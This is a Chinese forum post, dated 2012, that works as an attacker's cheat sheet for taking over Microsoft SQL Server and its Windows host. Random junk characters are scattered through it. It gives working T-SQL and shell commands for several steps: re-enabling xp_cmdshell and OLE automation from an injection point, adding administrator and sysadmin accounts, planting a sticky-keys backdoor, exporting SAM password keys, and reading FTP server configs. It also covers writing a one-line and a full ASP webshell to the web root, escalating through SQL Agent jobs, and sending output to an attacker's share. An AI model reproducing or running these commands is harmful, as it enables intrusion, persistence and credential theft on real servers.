1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
, a$ u* I! d! a3 }恢复方法:查询分离器连接后,
- b' r0 M- }7 q4 {# n( X第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! `) ]5 a" b1 H7 _6 d7 d第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' . Q8 s I3 R2 U9 A' x& R
然后按F5键命令执行完毕
W( t5 ?3 M% b
$ r- Y* o9 y/ b/ s0 y) D" b2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); v a. x- {; F, R6 U0 f# O5 W) I
恢复方法:查询分离器连接后,
$ b6 {, t% a7 B: m q第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
: t- O# }2 ^& s r5 m5 o! Q第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 Z. O# a8 ]% }* A# O& f然后按F5键命令执行完毕# \( `. V1 x6 z( E2 C# }4 d
0 m% Z* I% _# ^7 n6 y# j3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# N& W8 I- h* d; U& A
恢复方法:查询分离器连接后,6 s" m9 q+ w. p2 C q4 I
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 t5 K/ B+ T9 S5 T/ o6 G: v7 u6 O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
) ~/ U. s( U l! M然后按F5键命令执行完毕
4 A5 S7 K1 n# Z3 ]8 P1 z; x
. N4 p1 f4 g! X" ]) r4 终极方法.
7 m% }/ k- A0 @5 V如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:* w( ~9 v3 U' O, J! t& _
查询分离器连接后,1 W }, K8 m' I
2000servser系统:
- u% L$ [6 }/ g" g t+ ^! y9 h6 B% Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'& k5 J, _ U: o0 h% }/ h/ c
8 ]4 V8 D% D' N! ~; b) V kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'1 I; i4 {2 O# V. k
& x! ]: X7 l8 L$ pxp或2003server系统:
0 k+ N" P u1 i1 n& `: Y- A; R# W, h" q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3 z* J; Z) W0 N% r# V9 Y; C% ^& V
! X; v9 n) j: B- r; g8 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add', V; b" _1 g& h
3 Q; {& X- E$ Y# p5 t d. P
/ t5 \, z* n7 Q, t7 c五个SHIFT/ v& K7 H4 l8 Z' Y
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
& X- f7 A7 l0 \ a% n( J
, P( e ]- I2 ndeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 1 p, T% C6 m7 t
0 e9 q( T5 W" e' r& Axp_cmdshell执行命令另一种方法
3 ^; k: I3 r$ a( z8 u/ k; Ldeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
' s4 Y$ B4 V! {4 }( K3 O8 u6 D+ ?3 C8 W4 p
判断存储扩展是否存在9 l7 x# y) s- r" _4 C( D( S
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'. n9 A L0 D$ J2 n* P& Z: Y. Y
返回结果为1就OK4 o, p2 {2 |: ]- Z& U( |; x
9 Y' C" r) \8 C
- \+ Z2 I; N3 @" O上传xplog70.dll恢复xp_cmdshell语句:7 d8 Q/ x0 B4 `
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'& N3 V6 J ^4 ]/ ^5 @
- y, |8 @( Q$ M/ b0 a8 w: O* s否则上传xplog7.0.dll+ @& c0 N- L2 ?% L
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
! J# I q% {/ \7 d
- K% O% i L7 d& Y2 o! {% n" H- `: H
" y k( y$ m( h3 Z; t9 d+ e( K( u首先开启沙盘模式:
' ^: P& G& W) U2 z7 g4 I8 @* H5 e- hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',17 t1 c' l% ?$ y: @' h6 ^/ ^- ~/ J
$ h* T; q" d2 t8 e2 d; K `* ^
然后利用jet.oledb执行系统命令0 i, ]& X8 A# y( R9 q
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')! F# E" x6 H9 g
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
) _& s- R, C, d3 c$ t2 u8 q: @# X% W7 _5 d
. d( }0 I7 }3 `7 B. l O/ H% ^, U' N* A5 [0 S$ ~( m
恢复过程sp_addextendedproc 如下:
. L( L6 P" D0 Q2 l4 Hcreate procedure sp_addextendedproc --- 1996/08/30 20:13
9 L4 E, i" R4 _@functname nvarchar(517),/* (owner.)name of function to call */ ! ]* e! f) |" {- O
@dllname varchar(255)/* name of DLL containing function */ 9 R) y2 n! ]5 x1 p- _
as
) ]( P* ]2 I' h$ D/ vset implicit_transactions off
5 v# C0 S p* c i/ ~if @@trancount > 0 6 U4 W1 z+ w2 @* i
begin
: ?2 I8 W2 c" E" `- oraiserror(15002,-1,-1,'sp_addextendedproc')
0 ]1 M7 N$ l2 s( e. m) ureturn (1) ! g8 Q9 }% [# S0 l
end
9 n# O' i/ W, a/ {( c% w# jdbcc addextendedproc( @functname, @dllname)
( B% ~) U& W1 I7 u9 N/ d! breturn (0) -- sp_addextendedproc 9 q0 C5 I& ?$ Q% _ M+ _
GO
' k. _+ D. X0 S* k
0 t6 _3 W" _7 a+ K( K9 l4 ]
9 c. V3 {) s& f3 Q A, }
% m. l- G1 W# C! \& t导出管理员密码文件
. _$ N+ S3 ]7 M0 hsa默认可以读sam键.应该。+ Y6 a1 f, g( Y1 z9 T
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg# s0 w; C: e4 b4 p0 Z# z; V% B# U
net user administrator test# D) Y7 l( \' _/ H) y
用administrator登陆.. A: C* i5 u4 Z K9 E! {$ y
用完机器后+ ~# P$ g6 n* R7 z$ z. A6 o
reg import c:\test.reg
# J6 ?" M! F4 r5 r8 x3 w+ V根本不用克隆.
1 w' e3 |' t# k8 Q- z8 {# w找到对应的sid. % g0 \; S. ^( ?- y
y1 \3 V* i# z$ v1 k" T( J* K
& q; W7 ~' I; X1 T6 ]. ?
# h& ^8 {0 \. Z$ @. A8 Q; k
恢复所有存储过程
0 a# B9 L% `- ~" P4 R7 f# Nuse master ' x$ G/ H& Z& U4 i! H! q. G6 E
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
5 m' {: B; [8 Z" b9 b( wexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' % I; A& F& u4 ?, [; n; o
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
, d( O2 C7 v& _! L+ f) Jexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' % k$ v0 ]+ N4 e9 U
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 3 L, m& C7 ~3 \8 Y) e+ K
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
+ n; @" y! i% H+ |+ b5 U' C. fexec sp_addextendedproc sp_OADestroy,'odsole70.dll' & I, I% n0 Y* v# h0 K. o; j
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' % G3 g4 f( L( P/ _/ u
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
: g$ r3 D, Z! {+ y" aexec sp_addextendedproc sp_OAMethod,'odsole70.dll' * e ?4 M' N4 o: U1 F9 d4 I. B$ t
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
6 {, T7 C+ U5 |7 @, j" pexec sp_addextendedproc sp_OAStop,'odsole70.dll' ' P( U0 ~) ^% {% G" c
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
4 z8 ]% F) \+ L. t: v& Zexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
g% J& T6 _/ f9 g; u2 O3 Nexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
`3 z1 X0 R4 W% }) n% ]$ e* d' m7 Rexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
. N; Y- l- v9 `, e6 Hexec sp_addextendedproc xp_regread,'xpstar.dll' ! c7 H: V( e* J7 S+ y1 _* E/ d
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
8 U; A, v2 N6 Mexec sp_addextendedproc xp_regwrite,'xpstar.dll' / Y0 A: I# G- l+ \! ?
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'/ o. d3 n) w; i& r- c* u& o
/ f$ M/ n. K! h3 m$ _
2 B+ {( Y* Q6 b建立读文件的存储过程
( F8 T( [) q/ k: k$ q& e3 h! VCreate proc sp_readTextFile @filename sysname
8 ~% |8 N: y& e1 k7 |) O8 x8 u; T, _: Was
( R0 ?' K( G$ S! V2 M" k1 X% a
4 r0 O0 g) x* @! X3 W begin * t/ D$ O( B& i* l
set nocount on $ z+ g! H& K) a7 f, @
Create table #tempfile (line varchar(8000))! A5 ~; H" k ~
exec ('bulk insert #tempfile from "' + @filename + '"')' v3 T# J6 e5 R5 f, P. _: l* k
select * from #tempfile* P- t0 B! S( i \4 \3 Z* a" p
drop table #tempfile3 y% R1 b# V1 j5 c9 [/ v
End
( M" R! E& l f' l& C; X; v( ^9 _' d/ d8 c" B; x) m$ B5 B
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件" s0 {. A3 |6 l- r5 V& S' Y* \
查看登录用户 `9 d/ `2 K& ?# i- }* g
Select * from sysxlogins7 a) ?5 A* B4 @9 t
4 j# {9 F( _5 B7 E; X k r把文件内容读取到表中
" C, n& r/ Z2 F' s K& H+ C) R5 |; RBULK INSERT tmp from "c:\test.txt"2 J! ^- c5 @, \% t g, `+ p
dElete from 表名 清理表里的内容! `3 _7 Q4 x. f" X/ q& D
create table b_test(fn nvarchar(4000));建一个表,字段为fn5 Z, l* E- a5 Q6 b, ]
1 D) C4 B( c& M5 b
3 T8 L# W7 g* M加sa用户
( |5 s7 A4 i0 H- c& \( C) aexec master.dbo.sp_addlogin user,pass;
0 {( X8 G) W$ n j( e$ C/ Hexec master.dbo.sp_addsrvrolemember user,sysadmin
. A3 F) V" r! Z* O/ ~
6 ^6 b: ?5 `: L) a
9 f- }& D% L W: B
* f0 y2 ]: f6 c5 V8 l读文件代码
' z4 X, F3 F4 @+ Z3 Ideclare @o int, @f int, @t int, @ret int$ |% t* \" j5 D, ?0 |8 o$ y
declare @line varchar(8000)
/ v! j4 A7 \6 T& |$ C- ]exec sp_oacreate 'scripting.filesystemobject', @o out2 a) v0 d. R H+ z' }
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
& w. ^, r4 w) v- e) v+ h9 Texec @ret = sp_oamethod @f, 'readline', @line out1 R7 X4 F+ F# U* T
while( @ret = 0 )
% U, p% _, {2 j1 c& Q1 Obegin6 S, N: y0 e6 ^& }( Z
print @line
6 S3 j1 m( d1 _exec @ret = sp_oamethod @f, 'readline', @line out
$ h2 b7 h2 O W* N8 r/ e8 t5 @end
, ~( D' a6 i$ W) d, J7 _* m# g0 D6 e: x% f/ `! c
( A1 m3 G/ S: v3 d' `# c% e1 U
写文件代码:& q2 o& I5 X2 e7 Y" J% K* s% k, q
declare @o int, @f int, @t int, @ret int
0 c$ l' X0 t: j: z7 Xexec sp_oacreate 'scripting.filesystemobject', @o out
' e7 u! J8 x' n/ E' E3 K: Oexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1 ?/ ?9 e* ~ D
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》4 W4 [. q! C1 r
6 s4 Z" S: }2 Z
) s6 f$ F6 }' U- I添加lake2 shell
$ T7 X9 i( ?0 F4 \. S, |" S0 }3 Nsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
) m, @) `; b% U6 ]4 H/ csp_dropextendedproc xp_lake2. P% T9 M' t; D* |7 {
EXEC xp_lake2 'net user'1 M- b6 f |9 }5 Z' g
9 ^7 M8 F5 O* |# A: S
4 W# O- L- ]6 w2 H! ?: M得到硬盘文件信息 " s1 D/ ~0 I- D$ E0 s
--参数说明:目录名,目录深度,是否显示文件 3 A6 X0 d% V$ Z) v- m" A. a- E
execute master..xp_dirtree 'c:' , D+ l$ G) [0 y. x% `& ^- D
execute master..xp_dirtree 'c:',1
7 U) o( d; F" S' E1 }+ uexecute master..xp_dirtree 'c:',1,1
: o1 G" F; T2 b G: W2 W5 h r" H
; H4 d+ l( U' J" h; x1 |读serv-u配置信息
; M$ U. H1 w y! k( L0 H1 nexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
& g8 b. c+ r9 E+ Mexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'* {" U* V3 R+ i' P3 ^
" A) F- S: T. K
通过xp_regwrite写SHIFT后门+ A& K/ w" V2 T& _- x9 n
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
$ K% U9 v6 @9 t# K0 |
8 z& b0 E2 b3 t4 s& P: n. P. [1 T/ Z# U+ M3 q6 m1 l
% P4 w4 h/ F. Q8 z$ n, g
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';6 T8 ]+ I) K- x$ l! Z
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了+ w ^+ H* M ?0 Y( o
2 I% t- F; ~( X' A
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'2 X; k! k& Q+ Y( k: A
" s5 K6 J8 R2 s
; a0 `+ \/ _6 g1 i
7 l( V; r+ c* Dsql server 2005下开启xp_cmdshell的办法$ z6 g; i& d2 J0 z
N9 D; E' B5 k- j$ t) ?) d1 oEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;: F1 W9 a* Z! Q1 ^7 {( b
. Q4 l. Y7 u1 X8 _
SQL2005开启'OPENROWSET'支持的方法:
2 D. g1 M# N- x5 ]: i; a
0 ]/ t% m0 }" P% v. Y5 r% I- L# m( hexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
0 \) b3 B% Y1 n$ z, i6 a3 J7 l& A( O- R, Y! B; |9 W! N1 f
SQL2005开启'sp_oacreate'支持的方法:9 J' ]4 s4 o1 J% Y5 ]6 w9 b
+ s1 O* I6 G4 |- x/ y# _* Kexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
/ i! }+ J- Z- ^
* `# @9 E5 v. Q2 _1 b4 {
$ E% c4 c5 W# f. N/ d* m5 j5 W% N+ T7 b w
2 `3 z/ I! A9 E2 l: f" M" W8 p, u% E: B4 X. B) o9 z
2 w4 S: Z {: U* U! n3 g1 c9 l: v, m$ @
) `1 Z' z& T2 I2 V1 }
# K+ n" O) I) u1 J% w
7 l5 d+ L8 o C3 |1 v5 P
: P1 N# g' h3 Z6 d; W, x3 L& I1 o ?7 @- |& x% Q$ \: _0 \
2 s4 `! [6 A0 P: ^2 o% ] i) y, a& Y, A" O! L$ e l
) f! C& c3 o# A" X: C" I
9 Y& U! V; w& D9 v( d Q. X
' o% A& A4 O1 Y
+ f5 N5 i6 L0 r- a, g( @
, i" a1 _, x9 a+ I% D; k% C) y
" G# K2 r% }3 e- A1 K! c( V* L. D: i: C. _* O J
0 V& O7 \2 ~' }+ D& U8 O
' a' C8 M! a/ c, A) @# }7 {
/ k( p4 i% c" s以下方面不知道能不能成功暂且留下研究哈:
, \+ Y1 U. _! V' F4)
# D+ @; T( N' P" s% _- Muse msdb; --这儿不要是master哟
5 m5 [ y9 \: z: w' ]exec sp_add_job @job_name= czy82 ;
- R& a2 Y" ~$ E6 `% j8 y) kexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;8 Z' B$ C7 b- z: j3 A
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;2 ~$ I# \ i( v
exec sp_start_job @job_name= czy82 ;3 X, {6 K5 ~8 U3 c% l
9 y" S l7 Z! O4 a% U% ]( Q3 h( V# l' V利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以, b1 B0 e! ]/ U) Z
执行tsql语句了.: E" S# R- E7 ~+ l4 m! \
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名" {% y, I7 {4 P' E
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)5 X' r% _4 v, P; d) E2 G
net start SQLSERVERAGENT
6 Q2 t+ w9 ?# Z- x, B2 {2 z. `+ ^- B; p5 ~/ \. y+ C9 W5 `" _0 s
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的. }) @- P+ I6 Z( X
USE msdb
% x, {5 n' o$ y ]EXEC sp_add_job @job_name = GetSystemOnSQL ,
$ T' A/ U. F4 X7 p% Z8 _4 ]0 p1 X@enabled = 1,+ [/ x" x, ^; m+ h1 n5 K W7 b& ?/ r, G
@description = This will give a low privileged user access to/ V" F* l1 N. w- C
xp_cmdshell ,- Y5 y0 h8 @' G5 l+ M' A
@delete_level = 1" ?7 C1 L' |& f# z
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
) f$ r# Z" k0 y1 e. {9 i2 l@step_name = Exec my sql ,6 h ]2 J/ S& d- `6 Y0 H
@subsystem = TSQL ,, @1 W1 x( D( H
@command = exec master..xp_execresultset N select exec2 G1 l6 h& c/ K
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master 2 u9 k7 X, u6 z0 h
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
# R3 X1 j, ]$ {5 K@server_name = 你的SQL的服务器名
3 K. Z& S: X t& g) C& g' iEXEC sp_start_job @job_name = GetSystemOnSQL
8 ]0 \# ~! ^- D% _4 j R( D0 c8 _# y3 } P
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
0 y5 O" X8 g/ j: F2 V( ^才让我们可以以public执行xp_cmdshell+ c& s! T/ o8 o$ x5 Q, o
! D7 ~$ A( G$ W7 r9 r) [2 j5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
- |& ]1 _; o- I) Y& K$ ]在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
! a' j2 ]" G, a" B( N4 U; q. I' K
* Q2 X! [& m! E2 F, T7 SUSE msdb8 f, ~+ i" N# ~+ u1 y' Z# y: r
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
8 `; e, c, y) @ ]! L@enabled = 1, r2 U: A5 u. K$ f. n6 u# L7 H
@description = This will create a file called c:\sqlafc123.txt ,1 |6 T9 t5 y# E+ I/ ?. x& j$ g
@delete_level = 1
4 B& D7 S4 c, T4 ZEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
- b% ]1 W/ c+ W h# v7 z" [ N@step_name = SQLAFC ,/ y- q" A6 o* o4 n5 V* ]
@subsystem = TSQL ,3 _0 O8 e ^/ G) h- u- [
@command = select hello, this file was created by the SQL Agent. ," [8 U9 B9 e; L! v) o$ \# X/ E( O
@output_file_name = c:\sqlafc123.txt
' K: s+ O3 R+ W2 ^" v1 v Y' u& y6 e5 oEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
0 L" S2 l- w' D* I% M/ G. B9 u@server_name = SERVER_NAME
7 e1 L4 F5 V9 Q6 x' E3 j9 I$ AEXEC sp_start_job @job_name = ArbitraryFilecreate
9 y; x/ C6 g3 J: s9 I d, w* Y7 q7 s
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
1 C; x7 D: d5 I1 E
8 i3 }/ J1 i v3 l( k' i??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19, f" I N& w9 D7 K
----------------------------------------------- t3 ^, K: S2 f0 G5 H7 P
hello, this file was created by the SQL Agent.
* n# T5 y* V) r
l" V# ^6 E+ G3 Q- Y- S- y# y(1 ?????)
' i9 |1 w$ o- K" f, n! ^4 \; J
( i( L) {9 P+ Y6 W. F' C所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
$ n9 `" D2 x6 e$ N. Y* Z* W4 o! M& h6 Z命令的vbs文件到启动目录!' u# Q+ \% m( o7 N2 ?/ D$ u
, V5 ]" q5 A+ K8 m& B
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)* G- ^5 ~7 \: G; D) Q* B
关于sp_MScopyscriptfile 看下面的例子
- b* n5 G& c9 i; {' L! J$ }4 R* ?declare @command varchar(100) ) B# z' B0 m6 E% |5 c, t
declare @scripfile varchar(200)
. E% h, o) \8 q- j7 e( Zset concat_null_yields_null off
' `5 Q2 ]9 Q6 C' |' [$ mselect @command= dir c:\ > "\\attackerip\share\dir.txt" $ x! e# i. C/ u! B" B1 ~3 J
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
. N" z0 \6 q6 O( i. @exec sp_MScopyscriptfile @scripfile , # e# o# j7 {6 ?$ x
2 F& j, \* ?) X5 [, X1 H1 F
这两个东东都还在测试试哟/ L: d4 O8 F( m0 v5 q8 n
让MSSQL的public用户得到一个本机的web shell # n1 r. F+ {) W, _
2 A/ Z @$ p# w% F. t- k
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,' p& f% Z% C; V+ k8 ~
--@query= select <img src=vbscript:msgbox(now())>
7 A0 R ~) G1 a! y( b--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
5 t5 z+ `. W- N; B( x@query= select
. b/ e* d8 ^4 H" T8 L* }% i) o<%On Error Resume Next
' I9 H' ]! D8 {3 s9 t) j+ t* CSet oscript = Server.createObject("wscript.SHELL") & ]& H2 Q! L9 q! l
Set oscriptNet = Server.createObject("wscript.NETWORK") / B/ `; f4 \: e+ D) M' _7 d7 k" Z+ o
Set oFileSys = Server.createObject("scripting.FileSystemObject")
- W. T# Q9 q$ Z# O% Y2 O& gszCMD = Request.Form(".CMD")
& U; X' I7 [+ b0 r% LIf (szCMD <>"")Then 7 ^; u$ K( @2 q7 [# t0 U+ e
szTempFile = "C:\" & oFileSys.GetTempName() " r: S- E# O& Q" ?; W
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
4 I D' G) H6 ASet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
1 C( J# o3 U: n6 y! p: Q; iEnd If %> ! r& p4 t/ p; Y5 H9 x5 J
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
. ]) L6 q* P& r3 ]0 F( X<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 0 v" J4 e% {6 x* }7 Y- @
</FORM><RE>
% G+ \* K! f; [: [. S2 Z$ I<% If (IsObject(oFile))Then
; X- r: y; I: H( t; g, ^On Error Resume Next $ S3 F: s# o! l1 z0 `
Response.Write Server.HTMLEncode(oFile.ReadAll)
7 I$ N0 D+ G; i. c5 YoFile.Close
1 l* e" `9 R1 x* c5 a8 G$ pCall oFileSys.deleteFile(szTempFile, True)
5 T+ g9 q1 n9 c# e: Q) x# S: yEnd If%>
2 D+ E' ?4 ?# K% u1 S2 r, ?, f: m& P</BODY></HTML>
* c7 f- a' _$ r% N; P) D |
发表于 2012-9-15 14:37:30
收藏
支持
反对